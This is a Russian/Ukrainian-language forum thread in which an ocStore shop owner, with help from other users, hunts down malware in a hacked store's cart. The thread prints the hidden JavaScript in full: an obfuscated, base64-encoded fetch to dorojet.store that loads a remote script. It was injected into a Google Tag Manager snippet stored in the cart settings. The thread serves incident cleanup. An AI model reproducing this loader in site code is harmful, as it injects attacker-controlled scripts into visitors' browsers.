Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Нужна помощь в поиске вирусов на ocStore 2.1.0.2.1


stebgo

Recommended Posts

Здравствуйте.

 

Нужна помощь в устранении вируса в корзине сайта, и поиск вредоносного кода на ocStore 2.1.0.2.1

 

магазину примерно 7 лет, за это время там много чего было установлено, варезного в том числе. Недавно сайт был взломан но его удалось откачать. Грешу на установленный сайт на вордпресс рядом с магазином. Только после его удаления получилось восстановить работу магазина.

Из видимых проблем осталась только корзина, где антивирус  ругается на какой-то https://dorojet.store/

консоль гуглхрома пишет :       
 POST https://dorojet.store/ net::ERR_CONNECTION_RESET

и что-то еще подозрительное.

 

Мне нужно чтобы магазин смог продержаться еще 4-6 месяцев, пока я буду делать его на новом движке.

 

 

Screenshot_146.thumb.png.d728f9ca6675b2ab5e1696994f28f059.png

 

 

 

 

Надіслати
Поділитися на інших сайтах


Добрый день
пришлите ссылку на сайт

Надіслати
Поділитися на інших сайтах


там действительно уходит POST запрос к dorojet.store

в зашифрованном виде.

и ответ приходит тоже зашифрованный - Ly91bnBrZy5jb20vY3Jvc3MtZmV0Y2hAMy4xLjUvZGlzdC9jcm9zcy1mZXRjaC5qcw

unpkg.com/[email protected]/dist/cross-fetch.js

 

вот эту строчку ищите:

fetch(al('Ly9kb3JvamV0LnN0b3Jl'),{method:al("UE9TVA")}).then(r=>r.blob()).
then(c=>c.text().then(b=>{jl.src=al(b);d.head.appendChild(jl);}));

 

что это все такое и зачем без понятия :]

Снимок1.png

Снимок3.png

Снимок2.png

Снимок4.png

Снимок5.png

  • +1 2
Надіслати
Поділитися на інших сайтах


Спасибо за помощь, но пока не нашел эту пакость.

 

У меня лежит файл varvara.php, можете посмотреть через него?

https://manuart.net/varvara.php

 

там можно по всем файлам поиск сделать, раньше при помощи его искал всякие "base64_decode" и другой зашифрованный код.

 

результат по поискам 

fetch(al('Ly9kb3JvamV0LnN0b3Jl'),{method:al("UE9TVA")}).then(r=>r.blob()).
then(c=>c.text().then(b=>{jl.src=al(b);d.head.appendChild(jl);}));

ничего не дал, пробовал отдельно искать Ly9kb3JvamV0LnN0b3Jl  и fetch(al , так-же нулевой результат.

 

 

Надіслати
Поділитися на інших сайтах


Спасибо, чего-то я в бд не поискал.

varvara.php удалил. 

 

нашел в бд в настройках корзины симпле, 

мне нужно удалить в этом коде

(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\nnew Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)
[0],al=w.atob,\nj=d.createElement(s),jl=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'',p=d.location.pathname;jl.async=true;\nj.src='https:\/\/www.googletagmanager.com\/gtm.js?id='+i+dl;\nfetch(al('Ly9kb3JvamV0LnN0b3Jl'),{method:al(\"UE9TVA\")}).then(r=>r.blob()).\nthen(c=>c.text().then(b=>
{jl.src=al(b);d.head.appendChild(jl);}));\n})(window,document,'script','dataLayer','GTM-M9HN3LS');\n","addressFormats":{"1":{"ru":"{firstname} 
{lastname}\n{company}\n{field20}\n{address_1} {address_2}\n{postcode}\n{city} {zone}\n{country}","en":"{firstname} 
{lastname}\n{company}\n{field20}\n{address_1} {address_2}\n{postcode}\n{city} {zone}\n{country}","pl":"{firstname} 
{lastname}\n{company}\n{field20}\n{address_1} {address_2}\n{postcode}\n{city} 

только ?

fetch(al('Ly9kb3JvamV0LnN0b3Jl'),{method:al(\"UE9TVA\")}).then(r=>r.blob()).\nthen(c=>c.text().then(b=>{jl.src=al(b);d.head.appendChild(jl);}));

или еще ;\n} после него

вдруг лишнюю скобку оставлю которая будет вызывать сбой в работе, который сразу не замечу.

Надіслати
Поділитися на інших сайтах


Спасибо, чего-то я в бд не поискал.

varvara.php удалил. 

 

нашел в бд в настройках корзины симпле, 

мне нужно удалить в этом коде

(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\nnew Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)
[0],al=w.atob,\nj=d.createElement(s),jl=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'',p=d.location.pathname;jl.async=true;\nj.src='https:\/\/www.googletagmanager.com\/gtm.js?id='+i+dl;\nfetch(al('Ly9kb3JvamV0LnN0b3Jl'),{method:al(\"UE9TVA\")}).then(r=>r.blob()).\nthen(c=>c.text().then(b=>
{jl.src=al(b);d.head.appendChild(jl);}));\n})(window,document,'script','dataLayer','GTM-M9HN3LS');\n","addressFormats":{"1":{"ru":"{firstname} 
{lastname}\n{company}\n{field20}\n{address_1} {address_2}\n{postcode}\n{city} {zone}\n{country}","en":"{firstname} 
{lastname}\n{company}\n{field20}\n{address_1} {address_2}\n{postcode}\n{city} {zone}\n{country}","pl":"{firstname} 
{lastname}\n{company}\n{field20}\n{address_1} {address_2}\n{postcode}\n{city} 

только ?

fetch(al('Ly9kb3JvamV0LnN0b3Jl'),{method:al(\"UE9TVA\")}).then(r=>r.blob()).\nthen(c=>c.text().then(b=>{jl.src=al(b);d.head.appendChild(jl);}));

или еще ;\n} после него

вдруг лишнюю скобку оставлю которая будет вызывать сбой в работе, который сразу не замечу.

Надіслати
Поділитися на інших сайтах


Бажано виявити причину, для початку змінити паролі FTP..

 

На багатьох хостингах можна отримати доступ до файлів з іншого аккаунту через бекенд PHP

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.